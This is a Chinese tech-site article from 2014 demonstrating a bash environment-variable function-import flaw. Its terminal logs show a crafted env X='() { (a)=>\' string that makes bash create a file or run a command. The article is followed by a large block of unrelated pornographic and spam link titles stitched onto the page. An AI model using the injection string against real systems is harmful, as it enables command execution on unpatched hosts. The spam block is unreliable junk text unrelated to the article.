《電子技術應用》
您所在的位置:首頁 > 嵌入式技術 > 設計應用 > 一個linux下的bash安全漏洞
一個linux下的bash安全漏洞
摘要:
關鍵詞: bash 09 2014 2713 david davidcchen
Abstract:
Key words :

 1. 通過設置一個特殊的環境變量的env,能間接地查到到linux命令的屬性,如下:

  [2014-09-27 13:00:54 david@davidcchen ~]$ ls -l date

  ls: cannot access date: No such file or directory

  [2014-09-27 13:01:13 david@davidcchen ~]$ env -i X='() { (a)=>\' bash -c 'date'

  bash: X: line 1: syntax error near unexpected token `='

  bash: X: line 1: `'

  bash: error importing function definition for `X'

  [2014-09-27 13:01:21 david@davidcchen ~]$ ls -l date

  -rw-rw-r--. 1 david david 0 Sep 27 13:01 date

  [2014-09-27 13:01:27 david@davidcchen ~]$

  2. 一次運行環境變量。

  [2014-09-27 13:01:27 david@davidcchen ~]$ zsh --version

  zsh 4.3.10 (x86_64-redhat-linux-gnu)

  [2014-09-27 13:03:24 david@davidcchen ~]$ bash --version

  GNU bash, version 4.1.2(1)-release (x86_64-redhat-linux-gnu)

  Copyright (C) 2009 Free Software Foundation, Inc.

  License GPLv3+: GNU GPL version 3 or later

  This is free software; you are free to change and redistribute it.

  There is NO WARRANTY, to the extent permitted by law.

  [2014-09-27 13:03:31 david@davidcchen ~]$ env X='() { (a)=>\' bash -c "echo date"; cat echo; rm echo

  bash: X: line 1: syntax error near unexpected token `='

  bash: X: line 1: `'

  bash: error importing function definition for `X'

  Sat Sep 27 13:03:52 CST 2014

  ---------->成功運行date命令

此內容為AET網站原創,未經授權禁止轉載。
主站蜘蛛池模板: 一级做a爱片就在线看 | 国产95在线 | 亚洲 | 欧美一区二区三区综合色视频 | 日本一区二区在线不卡 | 免费视频www | 一级毛片视频 | 国产色手机在线观看播放 | 性欧美.video.free | 4138殇情影院理论片午夜 | 一区二区精品在线观看 | 女厕所vedioxxxx | 丁香激情综合网 | 你懂的网站在线观看 | 羞羞视频免费网站在线看 | 日本a在线观看 | 一级片免费观看视频 | 伊人日日操 | 黄色网址免费 | 色屁屁一区二区三区视频国产 | 欧美激情在线观看一区二区三区 | 狠狠色狠狠色综合日日五 | 欧美性爰视频 | 一级黄色录像放 | 天堂资源网 | 欧美一级黄色带 | 九九精品成人免费国产片 | 天天射综合 | 日本高清乱偷www | 久久精品国产亚洲a不卡 | 成人羞羞视频在线观看免费 | 欧美激情视频一区二区三区 | 亚洲一区二区视频在线观看 | 国产又黄又爽又猛的免费视频播放 | 欧美视频手机在线 | 2o2o天天看夜夜看狠狠看 | 91四虎国自产在线播放线 | 久久影视一区 | 草草影院最新 | 成年男女免费大片在线观看 | 日b视频免费 | 日韩理论 |